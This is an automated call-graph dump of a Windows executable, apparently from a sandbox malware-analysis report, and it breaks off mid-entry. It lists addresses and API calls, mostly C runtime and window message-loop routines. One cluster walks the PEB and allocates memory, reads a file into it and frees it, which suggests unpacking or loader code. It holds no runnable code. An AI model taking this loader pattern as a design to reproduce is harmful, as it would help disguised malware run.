3b9cc0 101804->101806 101833 3ba16b 58 API calls 2 library calls 101805->101833 101814 3b9ce1 _fseek 101806->101814 101836 3b881d 58 API calls 2 library calls 101806->101836 101808 3b9cad 101834 3ba1c8 58 API calls 7 library calls 101808->101834 101810 3b9cd5 101812 3b9ceb 101810->101812 101813 3b9cdc 101810->101813 101817 3b9c0b __lock 58 API calls 101812->101817 101837 3b8b28 58 API calls __getptd_noexit 101813->101837 101814->101771 101815 3b9cb4 101835 3b309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101815->101835 101819 3b9cf2 101817->101819 101821 3b9cff 101819->101821 101822 3b9d17 101819->101822 101838 3b9e2b InitializeCriticalSectionAndSpinCount 101821->101838 101839 3b2d55 101822->101839 101825 3b9d0b 101845 3b9d33 LeaveCriticalSection _doexit 101825->101845 101827->101771 101828->101771 101829->101766 101830->101770 101832->101802 101833->101808 101834->101815 101836->101810 101837->101814 101838->101825 101840 3b2d87 _free 101839->101840 101841 3b2d5e RtlFreeHeap 101839->101841 101840->101825 101841->101840 101842 3b2d73 101841->101842 101846 3b8b28 58 API calls __getptd_noexit 101842->101846 101844 3b2d79 GetLastError 101844->101840 101845->101814 101846->101844 101855 3c7d85 101847->101855 101849 3c85ba 101849->101779 101850->101777 101851->101779 101852->101784 101853->101786 101854->101775 101856 3c7d91 _fseek 101855->101856 101857 3c7da7 101856->101857 101859 3c7ddd 101856->101859 101942 3b8b28 58 API calls __getptd_noexit 101857->101942 101866 3c7e4e 101859->101866 101860 3c7dac 101943 3b8db6 9 API calls __gmtime64_s 101860->101943 101863 3c7df9 101944 3c7e22 LeaveCriticalSection __unlock_fhandle 101863->101944 101864 3c7db6 _fseek 101864->101849 101867 3c7e6e 101866->101867 101868 3b44ea __wsopen_nolock 58 API calls 101867->101868 101872 3c7e8a 101868->101872 101869 3c7fc1 101870 3b8dc6 __invoke_watson 8 API calls 101869->101870 101871 3c85a0 101870->101871 101873 3c7d85 __wsopen_helper 103 API calls 101871->101873 101872->101869 101874 3c7ec4 101872->101874 101881 3c7ee7 101872->101881 101876 3c85ba 101873->101876 101875 3b8af4 __write 58 API calls 101874->101875 101877 3c7ec9 101875->101877 101876->101863 101878 3b8b28 __gmtime64_s 58 API calls 101877->101878 101879 3c7ed6 101878->101879 101882 3b8db6 __gmtime64_s 9 API calls 101879->101882 101880 3c7fa5 101883 3b8af4 __write 58 API calls 101880->101883 101881->101880 101888 3c7f83 101881->101888 101884 3c7ee0 101882->101884 101885 3c7faa 101883->101885 101884->101863 101886 3b8b28 __gmtime64_s 58 API calls 101885->101886 101887 3c7fb7 101886->101887 101889 3b8db6 __gmtime64_s 9 API calls 101887->101889 101890 3bd294 __alloc_osfhnd 61 API calls 101888->101890 101889->101869 101891 3c8051 101890->101891 101892 3c807e 101891->101892 101893 3c805b 101891->101893 101894 3c7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101892->101894 101895 3b8af4 __write 58 API calls 101893->101895 101905 3c80a0 101894->101905 101896 3c8060 101895->101896 101897 3b8b28 __gmtime64_s 58 API calls 101896->101897 101899 3c806a 101897->101899 101898 3c811e GetFileType 101900 3c8129 GetLastError 101898->101900 101901 3c816b 101898->101901 101903 3b8b28 __gmtime64_s 58 API calls 101899->101903 101904 3b8b07 __dosmaperr 58 API calls 101900->101904 101910 3bd52a __set_osfhnd 59 API calls 101901->101910 101902 3c80ec GetLastError 101906 3b8b07 __dosmaperr 58 API calls 101902->101906 101903->101884 101908 3c8150 CloseHandle 101904->101908 101905->101898 101905->101902 101909 3c7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101905->101909 101907 3c8111 101906->101907 101913 3b8b28 __gmtime64_s 58 API calls 101907->101913 101908->101907 101911 3c815e 101908->101911 101912 3c80e1 101909->101912 101917 3c8189 101910->101917 101914 3b8b28 __gmtime64_s 58 API calls 101911->101914 101912->101898 101912->101902 101913->101869 101915 3c8163 101914->101915 101915->101907 101916 3c8344 101916->101869 101919 3c8517 CloseHandle 101916->101919 101917->101916 101918 3c18c1 __lseeki64_nolock 60 API calls 101917->101918 101933 3c820a 101917->101933 101920 3c81f3 101918->101920 101921 3c7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101919->101921 101923 3b8af4 __write 58 API calls 101920->101923 101939 3c8212 101920->101939 101922 3c853e 101921->101922 101925 3c83ce 101922->101925 101926 3c8546 GetLastError 101922->101926 101923->101933 101924 3c0e5b 70 API calls __read_nolock 101924->101939 101925->101869 101927 3b8b07 __dosmaperr 58 API calls 101926->101927 101928 3c8552 101927->101928 101931 3bd43d __free_osfhnd 59 API calls 101928->101931 101929 3c0add __close_nolock 61 API calls 101929->101939 101930 3c97a2 __chsize_nolock 82 API calls 101930->101939 101931->101925 101932 3bd886 __write 78 API calls 101932->101933 101933->101916 101933->101932 101935 3c18c1 60 API calls __lseeki64_nolock 101933->101935 101933->101939 101934 3c83c1 101937 3c0add __close_nolock 61 API calls 101934->101937 101935->101933 101936 3c83aa 101936->101916 101938 3c83c8 101937->101938 101941 3b8b28 __gmtime64_s 58 API calls 101938->101941 101939->101924 101939->101929 101939->101930 101939->101933 101939->101934 101939->101936 101940 3c18c1 60 API calls __lseeki64_nolock 101939->101940 101940->101939 101941->101925 101942->101860 101943->101864 101944->101864 101946 394b83 101945->101946 101947 394c3f LoadLibraryA 101945->101947 101946->101699 101946->101700 101947->101946 101948 394c50 GetProcAddress 101947->101948 101948->101946 101950 3b0db6 Mailbox 59 API calls 101949->101950 101951 395240 101950->101951 101951->101707 101953 394ec0 101952->101953 101954 394ea3 FindResourceExW 101952->101954 101953->101708 101954->101953 101955 3cd933 LoadResource 101954->101955 101955->101953 101956 3cd948 SizeofResource 101955->101956 101956->101953 101957 3cd95c LockResource 101956->101957 101957->101953 101959 3cd9ab 101958->101959 101960 394ef4 101958->101960 101964 3b584d 101960->101964 101962 394f02 101962->101718 101963->101708 101968 3b5859 _fseek 101964->101968 101965 3b586b 101977 3b8b28 58 API calls __getptd_noexit 101965->101977 101967 3b5891 101979 3b6c11 101967->101979 101968->101965 101968->101967 101969 3b5870 101978 3b8db6 9 API calls __gmtime64_s 101969->101978 101973 3b587b _fseek 101973->101962 101975 3b58a6 101986 3b58c8 LeaveCriticalSection LeaveCriticalSection _fprintf 101975->101986 101977->101969 101978->101973 101980 3b6c43 EnterCriticalSection 101979->101980 101981 3b6c21 101979->101981 101984 3b5897 101980->101984 101981->101980 101982 3b6c29 101981->101982 101983 3b9c0b __lock 58 API calls 101982->101983 101983->101984 101985 3b57be 83 API calls 5 library calls 101984->101985 101985->101975 101986->101973 101990 3b55fd 101987->101990 101989 394f2e 101989->101727 101991 3b5609 _fseek 101990->101991 101992 3b561f _memset 101991->101992 101993 3b564c 101991->101993 101994 3b5644 _fseek 101991->101994 102003 3b8b28 58 API calls __getptd_noexit 101992->102003 101995 3b6c11 __lock_file 59 API calls 101993->101995 101994->101989 101997 3b5652 101995->101997 102005 3b541d 72 API calls 6 library calls 101997->102005 101998 3b5639 102004 3b8db6 9 API calls __gmtime64_s 101998->102004 102001 3b5668 102006 3b5686 LeaveCriticalSection LeaveCriticalSection _fprintf 102001->102006 102003->101998 102004->101994 102005->102001 102006->101994 102010 3b520a GetSystemTimeAsFileTime 102007->102010 102009 3f8f6e 102009->101729 102011 3b5238 __aulldiv 102010->102011 102011->102009 102013 3b5c6c _fseek 102012->102013 102014 3b5c7e 102013->102014 102015 3b5c93 102013->102015 102026 3b8b28 58 API calls __getptd_noexit 102014->102026 102017 3b6c11 __lock_file 59 API calls 102015->102017 102019 3b5c99 102017->102019 102018 3b5c83 102027 3b8db6 9 API calls __gmtime64_s 102018->102027 102028 3b58d0 67 API calls 6 library calls 102019->102028 102022 3b5ca4 102029 3b5cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 102022->102029 102024 3b5cb6 102025 3b5c8e _fseek 102024->102025 102025->101734 102026->102018 102027->102025 102028->102022 102029->102024 102031 397d99 102030->102031 102032 397da6 102030->102032 102031->101532 102033 3b0db6 Mailbox 59 API calls 102032->102033 102033->102031 102034->101558 102035->101605 102036->101607 102037->101657 102039 3b486f _fseek 102038->102039 102040 3b488d 102039->102040 102041 3b48a5 102039->102041 102043 3b489d _fseek 102039->102043 102088 3b8b28 58 API calls __getptd_noexit 102040->102088 102044 3b6c11 __lock_file 59 API calls 102041->102044 102043->101668 102046 3b48ab 102044->102046 102045 3b4892 102089 3b8db6 9 API calls __gmtime64_s 102045->102089 102076 3b470a 102046->102076 102052 3b53b2 _fseek 102051->102052 102053 3b53de 102052->102053 102054 3b53c6 102052->102054 102056 3b6c11 __lock_file 59 API calls 102053->102056 102060 3b53d6 _fseek 102053->102060 102271 3b8b28 58 API calls __getptd_noexit 102054->102271 102058 3b53f0 102056->102058 102057 3b53cb 102060->101661 102072 3f9748 __tzset_nolock _wcscmp 102067->102072 102068 394f0b 74 API calls 102068->102072 102069 3f9210 102069->101638 102073 3b40fb 58 API calls __wsplitpath_helper 102069->102073 102070 3f9109 GetSystemTimeAsFileTime 102070->102072 102071 394ee5 85 API calls 102071->102072 102072->102068 102072->102069 102072->102070 102072->102071 102073->101640 102074->101648 102088->102045 102089->102043 102271->102057 102350 3f3c3e 102349->102350 102351 3f4475 FindFirstFileW 102349->102351 102350->101307 102351->102350 102352 3f448a FindClose 102351->102352 102352->102350 102354 39818f 102353->102354 102357 3981aa 102353->102357 102355 397e4f 59 API calls 102354->102355 102356 398197 CharUpperBuffW 102355->102356 102356->102357 102357->101316 102359 39f251 102358->102359 102361 39f272 102359->102361 102486 3f9e4a 90 API calls 4 library calls 102359->102486 102361->101336 102363 3cedbd 102362->102363 102364 39838d 102362->102364 102365 3b0db6 Mailbox 59 API calls 102364->102365 102366 398394 102365->102366 102367 3983b5 102366->102367 102487 398634 59 API calls Mailbox 102366->102487 102367->101335 102367->101342 102370 3d4cc3 102369->102370 102382 3a09f5 102369->102382 102534 3f9e4a 90 API calls 4 library calls 102370->102534 102372 3a0cfa 102372->101364 102374 3a0ee4 102374->102372 102376 3a0ef1 102374->102376 102532 3a1093 332 API calls Mailbox 102376->102532 102377 3a0a4b PeekMessageW 102445 3a0a05 Mailbox 102377->102445 102380 3a0ef8 LockWindowUpdate DestroyWindow GetMessageW 102380->102372 102384 3a0f2a 102380->102384 102381 3a0ce4 102381->102372 102531 3a1070 10 API calls Mailbox 102381->102531 102382->102445 102535 399e5d 60 API calls 102382->102535 102536 3e6349 332 API calls 102382->102536 102383 3d4e81 Sleep 102383->102445 102386 3d5c58 TranslateMessage DispatchMessageW GetMessageW 102384->102386 102386->102386 102387 3d5c88 102386->102387 102387->102372 102388 399e5d 60 API calls 102388->102445 102389 3a0e43 PeekMessageW 102389->102445 102390 3a0ea5 TranslateMessage DispatchMessageW 102390->102389 102391 3d4d50 TranslateAcceleratorW 102391->102389 102391->102445 102392 3d581f WaitForSingleObject 102398 3d583c GetExitCodeProcess CloseHandle 102392->102398 102392->102445 102394 3a0d13 timeGetTime 102394->102445 102395 3a0e5f Sleep 102431 3a0e70 Mailbox 102395->102431 102396 398047 59 API calls 102396->102445 102397 397667 59 API calls 102397->102431 102430 3a0f95 102398->102430 102399 3d5af8 Sleep 102399->102431 102401 3b0db6 59 API calls Mailbox 102401->102445 102402 39b73c 305 API calls 102402->102445 102404 3b049f timeGetTime 102404->102431 102405 3a0f4e timeGetTime 102533 399e5d 60 API calls 102405->102533 102408 3d5b8f GetExitCodeProcess 102411 3d5bbb CloseHandle 102408->102411 102412 3d5ba5 WaitForSingleObject 102408->102412 102409 399837 85 API calls 102409->102445 102410 39b7dd 110 API calls 102410->102431 102411->102431 102412->102411 102412->102445 102415 415f25 111 API calls 102415->102431 102416 3d5874 102416->102430 102417 3d5078 Sleep 102417->102445 102418 3d5c17 Sleep 102418->102445 102420 397de1 59 API calls 102420->102431 102425 39f460 305 API calls 102425->102445 102426 39fce0 305 API calls 102426->102445 102429 397de1 59 API calls 102429->102445 102430->101364 102431->102397 102431->102404 102431->102408 102431->102410 102431->102415 102431->102416 102431->102417 102431->102418 102431->102420 102431->102430 102431->102445 102542 3f2408 60 API calls 102431->102542 102543 399e5d 60 API calls 102431->102543 102544 3989b3 69 API calls Mailbox 102431->102544 102545 39b73c 332 API calls 102431->102545 102546 3e64da 60 API calls 102431->102546 102547 3f5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 102431->102547 102548 3f3c55 66 API calls Mailbox 102431->102548 102432 3f9e4a 90 API calls 102432->102445 102434 3984c0 69 API calls 102434->102445 102435 399c90 59 API calls Mailbox 102435->102445 102436 399ea0 305 API calls 102436->102445 102437 3982df 59 API calls 102437->102445 102438 3989b3 69 API calls 102438->102445 102439 3e617e 59 API calls Mailbox 102439->102445 102440 3d55d5 VariantClear 102440->102445 102441 3d566b VariantClear 102441->102445 102442 398cd4 59 API calls Mailbox 102442->102445 102443 3d5419 VariantClear 102443->102445 102444 3e6e8f 59 API calls 102444->102445 102445->102377 102445->102381 102445->102383 102445->102388 102445->102389 102445->102390 102445->102391 102445->102392 102445->102394 102445->102395 102445->102396 102445->102399 102445->102401 102445->102402 102445->102405 102445->102409 102445->102425 102445->102426 102445->102429 102445->102430 102445->102431 102445->102432 102445->102434 102445->102435 102445->102436 102445->102437 102445->102438 102445->102439 102445->102440 102445->102441 102445->102442 102445->102443 102445->102444 102488 39e420 102445->102488 102495 39e6a0 102445->102495 102526 3931ce 102445->102526 102537 416018 59 API calls 102445->102537 102538 3f9a15 59 API calls Mailbox 102445->102538 102539 3ed4f2 59 API calls 102445->102539 102540 3e60ef 59 API calls 2 library calls 102445->102540 102541 398401 59 API calls 102445->102541 102447 3ceda1 102446->102447 102450 3982f2 102446->102450 102448 3cedb1 102447->102448 102594 3e61a4 59 API calls 102447->102594 102451 39831c 102450->102451 102452 3985c0 59 API calls 102450->102452 102453 398339 Mailbox 102450->102453 102454 3985c0 59 API calls 102451->102454 102455 398322 102451->102455 102452->102451 102453->101392 102454->102455 102455->102453 102456 399c90 Mailbox 59 API calls 102455->102456 102456->102453 102457->101386 102458->101386 102459->101317 102460->101372 102461->101326 102462->101372 102463->101372 102464->101334 102465->101343 102466->101344 102467->101344 102469 3985ce 102468->102469 102475 3985f6 102468->102475 102470 3985dc 102469->102470 102471 3985c0 59 API calls 102469->102471 102472 3985c0 59 API calls 102470->102472 102473 3985e2 102470->102473 102471->102470 102472->102473 102474 399c90 Mailbox 59 API calls 102473->102474 102473->102475 102474->102475 102475->101341 102476->101386 102477->101386 102478->101386 102480 3984cb 102479->102480 102482 3984f2 102480->102482 102595 3989b3 69 API calls Mailbox 102480->102595 102482->101371 102483->101372 102484->101365 102485->101372 102486->102361 102487->102367 102489 39e43d 102488->102489 102490 39e451 102488->102490 102549 39df00 332 API calls 2 library calls 102489->102549 102550 3f9e4a 90 API calls 4 library calls 102490->102550 102492 39e448 102492->102445 102494 3d3aa4 102494->102494 102496 39e6d5 102495->102496 102497 3d3aa9 102496->102497 102500 39e73f 102496->102500 102511 39e799 102496->102511 102498 399ea0 332 API calls 102497->102498 102499 3d3abe 102498->102499 102514 39e970 Mailbox 102499->102514 102552 3f9e4a 90 API calls 4 library calls 102499->102552 102503 397667 59 API calls 102500->102503 102500->102511 102501 397667 59 API calls 102501->102511 102505 3d3b04 102503->102505 102504 3b2d40 __cinit 67 API calls 102504->102511 102553 3b2d40 102505->102553 102506 39ea78 102506->102445 102507 3d3b26 102507->102445 102509 3984c0 69 API calls 102509->102514 102510 399ea0 332 API calls 102510->102514 102511->102501 102511->102504 102511->102507 102512 39e95a 102511->102512 102511->102514 102512->102514 102556 3f9e4a 90 API calls 4 library calls 102512->102556 102514->102506 102514->102509 102514->102510 102515 39f195 102514->102515 102516 399c90 Mailbox 59 API calls 102514->102516 102519 3f9e4a 90 API calls 102514->102519 102520 398d40 59 API calls 102514->102520 102551 397f77 59 API calls 2 library calls 102514->102551 102557 3e6e8f 59 API calls 102514->102557 102558 40c5c3 332 API calls 102514->102558 102559 40b53c 332 API calls Mailbox 102514->102559 102561 4093c6 332 API calls Mailbox 102514->102561 102560 3f9e4a 90 API calls 4 library calls 102515->102560 102516->102514 102519->102514 102520->102514 102525 3d3e25 102525->102445 102527 393212 102526->102527 102528 3931e0 102526->102528 102527->102445 102528->102527 102529 393205 IsDialogMessageW 102528->102529 102530 3ccf32 GetClassLongW 102528->102530 102529->102527 102529->102528 102530->102528 102530->102529 102531->102374 102532->102380 102533->102445 102534->102382 102535->102382 102536->102382 102537->102445 102538->102445 102539->102445 102540->102445 102541->102445 102542->102431 102543->102431 102544->102431 102545->102431 102546->102431 102547->102431 102548->102431 102549->102492 102550->102494 102551->102514 102552->102514 102562 3b2c44 102553->102562 102555 3b2d4b 102555->102511 102556->102514 102557->102514 102558->102514 102559->102514 102560->102525 102561->102514 102563 3b2c50 _fseek 102562->102563 102570 3b3217 102563->102570 102569 3b2c77 _fseek 102569->102555 102571 3b9c0b __lock 58 API calls 102570->102571 102572 3b2c59 102571->102572 102573 3b2c88 DecodePointer DecodePointer 102572->102573 102574 3b2c65 102573->102574 102575 3b2cb5 102573->102575 102584 3b2c82 102574->102584 102575->102574 102587 3b87a4 59 API calls __gmtime64_s 102575->102587 102577 3b2d18 EncodePointer EncodePointer 102577->102574 102578 3b2cec 102578->102574 102582 3b2d06 EncodePointer 102578->102582 102589 3b8864 61 API calls 2 library calls 102578->102589 102579 3b2cc7 102579->102577 102579->102578 102588 3b8864 61 API calls 2 library calls 102579->102588 102582->102577 102583 3b2d00 102583->102574 102583->102582 102590 3b3220 102584->102590 102587->102579 102588->102578 102589->102583 102593 3b9d75 LeaveCriticalSection 102590->102593 102592 3b2c87 102592->102569 102593->102592 102594->102448 102595->102482 102597 3e60cb 102596->102597 102598 3e60e8 102596->102598 102597->102598 102600 3e60ab 59 API calls Mailbox 102597->102600 102598->100946 102600->102597 102601->100953 102602->100965 102603->100965 102604->100971 102605 1317de0 102619 1315a30 102605->102619 102607 1317eed 102622 1317cd0 102607->102622 102625 1318f20 GetPEB 102619->102625 102621 13160bb 102621->102607 102623 1317cd9 Sleep 102622->102623 102624 1317ce7 102623->102624 102626 1318f4a 102625->102626 102626->102621 102627 3d416f 102631 3e5fe6 102627->102631 102629 3d417a 102630 3e5fe6 86 API calls 102629->102630 102630->102629 102632 3e6020 102631->102632 102637 3e5ff3 102631->102637 102632->102629 102633 3e6022 102643 399328 85 API calls Mailbox 102633->102643 102635 3e6027 102636 399837 85 API calls 102635->102636 102638 3e602e 102636->102638 102637->102632 102637->102633 102637->102635 102640 3e601a 102637->102640 102639 397b2e 59 API calls 102638->102639 102639->102632 102642 3995a0 59 API calls _wcsstr 102640->102642 102642->102632 102643->102635 102644 39e5ab 102647 39d100 102644->102647 102646 39e5b9 102648 39d11d 102647->102648 102676 39d37d 102647->102676 102649 3d2691 102648->102649 102650 3d26e0 102648->102650 102679 39d144 102648->102679 102652 3d2694 102649->102652 102661 3d26af 102649->102661 102691 40a3e6 332 API calls __cinit 102650->102691 102654 3d26a0 102652->102654 102652->102679 102689 40a9fa 332 API calls 102654->102689 102655 3b2d40 __cinit 67 API calls 102655->102679 102658 39d434 102683 398a52 68 API calls 102658->102683 102659 3d28b5 102659->102659 102660 39d54b 102660->102646 102661->102676 102690 40aea2 332 API calls 3 library calls 102661->102690 102665 3d27fc 102694 40a751 90 API calls 102665->102694 102666 39d443 102666->102646 102669 3984c0 69 API calls 102669->102679 102674 399d3c 60 API calls 102674->102679 102676->102660 102695 3f9e4a 90 API calls 4 library calls 102676->102695 102677 399ea0 332 API calls 102677->102679 102678 398047 59 API calls 102678->102679 102679->102655 102679->102658 102679->102660 102679->102665 102679->102669 102679->102674 102679->102676 102679->102677 102679->102678 102681 398740 68 API calls __cinit 102679->102681 102682 398542 68 API calls 102679->102682 102684 39843a 68 API calls 102679->102684 102685 39cf7c 332 API calls 102679->102685 102686 399dda 59 API calls Mailbox 102679->102686 102687 39cf00 90 API calls 102679->102687 102688 39cd7d 332 API calls 102679->102688 102692 398a52 68 API calls 102679->102692 102693 3e678d 60 API calls 102679->102693 102681->102679 102682->102679 102683->102666 102684->102679 102685->102679 102686->102679 102687->102679 102688->102679 102689->102660 102690->102676 102691->102679 102692->102679 102693->102679 102694->102676 102695->102659 102696 39107d 102701 39708b 102696->102701 102698 39108c 102699 3b2d40 __cinit 67 API calls 102698->102699 102700 391096 102699->102700 102702 39709b __write_nolock 102701->102702 102703 397667 59 API calls 102702->102703 102704 397151 102703->102704 102732 394706 102704->102732 102706 39715a 102739 3b050b 102706->102739 102709 397cab 59 API calls 102710 397173 102709->102710 102745 393f74 102710->102745 102713 397667 59 API calls 102714 39718b 102713->102714 102715 397d8c 59 API calls 102714->102715 102716 397194 RegOpenKeyExW 102715->102716 102717 3ce8b1 RegQueryValueExW 102716->102717 102718 3971b6 Mailbox 102716->102718 102719 3ce8ce 102717->102719 102720 3ce943 RegCloseKey 102717->102720 102718->102698 102721 3b0db6 Mailbox 59 API calls 102719->102721 102720->102718 102731 3ce955 _wcscat Mailbox __NMSG_WRITE 102720->102731 102722 3ce8e7 102721->102722 102723 39522e 59 API calls 102722->102723 102724 3ce8f2 RegQueryValueExW 102723->102724 102725 3ce90f 102724->102725 102728 3ce929 102724->102728 102726 397bcc 59 API calls 102725->102726 102726->102728 102727 3979f2 59 API calls 102727->102731 102728->102720 102729 397de1 59 API calls 102729->102731 102730 393f74 59 API calls 102730->102731 102731->102718 102731->102727 102731->102729 102731->102730 102751 3c1940 102732->102751 102735 397de1 59 API calls 102736 394739 102735->102736 102753 394750 102736->102753 102738 394743 Mailbox 102738->102706 102740 3c1940 __write_nolock 102739->102740 102741 3b0518 GetFullPathNameW 102740->102741 102742 3b053a 102741->102742 102743 397bcc 59 API calls 102742->102743 102744 397165 102743->102744 102744->102709 102746 393f82 102745->102746 102750 393fa4 _memmove 102745->102750 102748 3b0db6 Mailbox 59 API calls 102746->102748 102747 3b0db6 Mailbox 59 API calls 102749 393fb8 102747->102749 102748->102750 102749->102713 102750->102747 102752 394713 GetModuleFileNameW 102751->102752 102752->102735 102754 3c1940 __write_nolock 102753->102754 102755 39475d GetFullPathNameW 102754->102755 102756 394799 102755->102756 102757 39477c 102755->102757 102759 397d8c 59 API calls 102756->102759 102758 397bcc 59 API calls 102757->102758 102760 394788 102758->102760 102759->102760 102763 397726 102760->102763 102764 397734 102763->102764 102765 397d2c 59 API calls 102764->102765 102766 394794 102765->102766 102766->102738 102767 393633 102768 39366a 102767->102768 102769 393688 102768->102769 102770 3936e7 102768->102770 102811 3936e5 102768->102811 102774 39374b PostQuitMessage 102769->102774 102775 393695 102769->102775 102772 3cd0cc 102770->102772 102773 3936ed 102770->102773 102771 3936ca DefWindowProcW 102781 3936d8 102771->102781 102822 3a1070 10 API calls Mailbox 102772->102822 102776 3936f2 102773->102776 102777 393715 SetTimer RegisterWindowMessageW 102773->102777 102774->102781 102779 3cd154 102775->102779 102780 3936a0 102775->102780 102782 3936f9 KillTimer 102776->102782 102783 3cd06f 102776->102783 102777->102781 102785 39373e CreatePopupMenu 102777->102785 102838 3f2527 71 API calls _memset 102779->102838 102786 3936a8 102780->102786 102787 393755 102780->102787 102819 39443a Shell_NotifyIconW _memset 102782->102819 102795 3cd0a8 MoveWindow 102783->102795 102796 3cd074 102783->102796 102784 3cd0f3 102823 3a1093 332 API calls Mailbox 102784->102823 102785->102781 102791 3cd139 102786->102791 102792 3936b3 102786->102792 102812 3944a0 102787->102812 102791->102771 102837 3e7c36 59 API calls Mailbox 102791->102837 102800 3936be 102792->102800 102801 3cd124 102792->102801 102793 3cd166 102793->102771 102793->102781 102795->102781 102797 3cd078 102796->102797 102798 3cd097 SetFocus 102796->102798 102797->102800 102802 3cd081 102797->102802 102798->102781 102799 39370c 102820 393114 DeleteObject DestroyWindow Mailbox 102799->102820 102800->102771 102824 39443a Shell_NotifyIconW _memset 102800->102824 102836 3f2d36 81 API calls _memset 102801->102836 102821 3a1070 10 API calls Mailbox 102802->102821 102807 3cd134 102807->102781 102809 3cd118 102825 39434a 102809->102825 102811->102771 102813 394539 102812->102813 102814 3944b7 _memset 102812->102814 102813->102781 102839 39407c 102814->102839 102816 394522 KillTimer SetTimer 102816->102813 102817 3944de 102817->102816 102818 3cd4ab Shell_NotifyIconW 102817->102818 102818->102816 102819->102799 102820->102781 102821->102781 102822->102784 102823->102800 102824->102809 102826 394375 _memset 102825->102826 102861 394182 102826->102861 102830 394430 Shell_NotifyIconW 102832 394422 102830->102832 102831 394414 Shell_NotifyIconW 102831->102832 102833 39407c 61 API calls 102832->102833 102835 394429 102833->102835 102834 3943fa 102834->102830 102834->102831 102835->102811 102836->102807 102837->102811 102838->102793 102840 394098 102839->102840 102860 39416f Mailbox 102839->102860 102841 397a16 59 API calls 102840->102841 102842 3940a6 102841->102842 102843 3cd3c8 LoadStringW 102842->102843 102844 3940b3 102842->102844 102847 3cd3e2 102843->102847 102845 397bcc 59 API calls 102844->102845 102846 3940c8 102845->102846 102846->102847 102848 3940d9 102846->102848 102849 397b2e 59 API calls 102847->102849 102850 3940e3 102848->102850 102851 394174 102848->102851 102854 3cd3ec 102849->102854 102852 397b2e 59 API calls 102850->102852 102853 398047 59 API calls 102851->102853 102857 3940ed _memset _wcscpy 102852->102857 102853->102857 102855 397cab 59 API calls 102854->102855 102854->102857 102856 3cd40e 102855->102856 102859 397cab 59 API calls 102856->102859 102858 394155 Shell_NotifyIconW 102857->102858 102858->102860 102859->102857 102860->102817 102862 3cd423 102861->102862 102863 394196 102861->102863 102862->102863 102864 3cd42c DestroyIcon 102862->102864 102863->102834 102865 3f2f94 62 API calls _W_store_winword 102863->102865 102864->102863 102865->102834 102866 131838b 102867 13183a0 102866->102867 102868 1315a30 GetPEB 102867->102868 102869 13183ac 102868->102869 102870 1318460 102869->102870 102871 13183ca 102869->102871 102888 1318d10 9 API calls 102870->102888 102875 1318070 102871->102875 102874 1318447 102876 1315a30 GetPEB 102875->102876 102879 131810f 102876->102879 102878 1318140 CreateFileW 102878->102879 102882 131814d 102878->102882 102880 1318169 VirtualAlloc 102879->102880 102879->102882 102886 1318270 CloseHandle 102879->102886 102887 1318280 VirtualFree 102879->102887 102889 1318f80 GetPEB 102879->102889 102881 131818a ReadFile 102880->102881 102880->102882 102881->102882 102885 13181a8 VirtualAlloc 102881->102885 102883 131836a 102882->102883 102884 131835c VirtualFree 102882->102884 102883->102874 102884->102883 102885->102879 102885->102882 102886->102879 102887->102879 102888->102874 102890 1318faa 102889->102890 102890->102878 102891 3cfe27 102904 3af944 102891->102904 102893 3cfe3d 102894 3cfebe 102893->102894 102895 3cfe53 102893->102895 102898 39fce0 332 API calls 102894->102898 102913 399e5d 60 API calls 102895->102913 102897 3cfe92 102899 3d089c 102897->102899 102900 3cfe9a 102897->102900 102903 3cfeb2 Mailbox 102898->102903 102915 3f9e4a 90 API calls 4 library calls 102899->102915 102914 3f834f 59 API calls Mailbox 102900->102914 102905 3af962 102904->102905 102906 3af950 102904->102906 102908 3af968 102905->102908 102909 3af991 102905->102909 102907 399d3c 60 API calls 102906->102907 102912 3af95a 102907->102912 102911 3b0db6 Mailbox 59 API calls 102908->102911 102910 399d3c 60 API calls 102909->102910 102910->102912 102911->102912 102912->102893 102913->102897 102914->102903 102915->102903 102916 391055 102921 392649 102916->102921 102919 3b2d40 __cinit 67 API calls 102920 391064 102919->102920 102922 397667 59 API calls 102921->102922 102923 3926b7 102922->102923 102928 393582 102923->102928 102926 392754 102927 39105a 102926->102927 102931 393416 59 API calls 2 library calls 102926->102931 102927->102919 102932 3935b0 102928->102932 102931->102926 102933 3935bd 102932->102933 102934 3935a1 102932->102934 102933->102934 102935 3935c4 RegOpenKeyExW 102933->102935 102934->102926 102935->102934 102936 3935de RegQueryValueExW 102935->102936 102937 3935ff 102936->102937 102938 393614 RegCloseKey 102936->102938 102937->102938 102938->102934 102939 3b7c56 102940 3b7c62 _fseek 102939->102940 102976 3b9e08 GetStartupInfoW 102940->102976 102942 3b7c67 102978 3b8b7c GetProcessHeap 102942->102978 102944 3b7cbf 102945 3b7cca 102944->102945 103061 3b7da6 58 API calls 3 library calls 102944->103061 102979 3b9ae6 102945->102979 102948 3b7cd0 102949 3b7cdb __RTC_Initialize 102948->102949 103062 3b7da6 58 API calls 3 library calls 102948->103062 103000 3bd5d2 102949->103000 102952 3b7cea 102953 3b7cf6 GetCommandLineW 102952->102953 103063 3b7da6 58 API calls 3 library calls 102952->103063 103019 3c4f23 GetEnvironmentStringsW 102953->103019 102956 3b7cf5 102956->102953 102959 3b7d10 102960 3b7d1b 102959->102960 103064 3b30b5 58 API calls 3 library calls 102959->103064 103029 3c4d58 102960->103029 102963 3b7d21 102964 3b7d2c 102963->102964 103065 3b30b5 58 API calls 3 library calls 102963->103065 103043 3b30ef 102964->103043 102967 3b7d34 102968 3b7d3f __wwincmdln 102967->102968 103066 3b30b5 58 API calls 3 library calls 102967->103066 103049 3947d0 102968->103049 102971 3b7d53 102972 3b7d62 102971->102972 103067 3b3358 58 API calls _doexit 102971->103067 103068 3b30e0 58 API calls _doexit 102972->103068 102975 3b7d67 _fseek 102977 3b9e1e 102976->102977 102977->102942 102978->102944 103069 3b3187 36 API calls 2 library calls 102979->103069 102981 3b9aeb 103070 3b9d3c InitializeCriticalSectionAndSpinCount __ioinit 102981->103070 102983 3b9af0 102984 3b9af4 102983->102984 103072 3b9d8a TlsAlloc 102983->103072 103071 3b9b5c 61 API calls 2 library calls 102984->103071 102987 3b9af9 102987->102948 102988 3b9b06 102988->102984 102989 3b9b11 102988->102989 103073 3b87d5 102989->103073 102992 3b9b53 103081 3b9b5c 61 